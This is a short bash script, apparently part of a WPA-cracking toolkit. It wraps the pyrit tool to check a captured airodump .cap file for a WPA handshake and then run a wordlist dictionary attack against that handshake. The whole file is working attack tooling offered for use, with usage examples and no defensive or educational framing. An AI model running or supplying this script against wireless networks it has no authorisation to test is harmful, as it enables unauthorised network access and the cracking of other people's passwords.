#!/bin/bash

# pyrit -r ./WPA-Attack/airodump_logs/LOOG.log-01.cap analyze
# analyze if there is handshake in a .cap file, it is better than aircrack
# @param .cap file
pyritAnalyzeLog(){
      pyrit -r $1 analyze
}
# pyrit --all-handshakes -r ./WPA-Attack/airodump_logs/LOOG.log-01.cap -i ./WPA-Attack/wordlistExample.txt attack_passthrough
# attacks using .cap file and wordlist file
pyritAttack(){
      pyrit --all-handshakes -r $1 -i $2 attack_passthrough
}

if [[ -z "$1" || -z "$2" ]]; then
  echo "Using: $0 [.cap FILE_PATH] [WORDLIST_FILE_PATH]";
  echo "Example:";
  echo "$0 ./airodump_logs/LOOG.log-01.cap ./wordlistExample.txt";
  exit;
fi

pyritAnalyzeLog $1;
pyritAttack $1 $2;
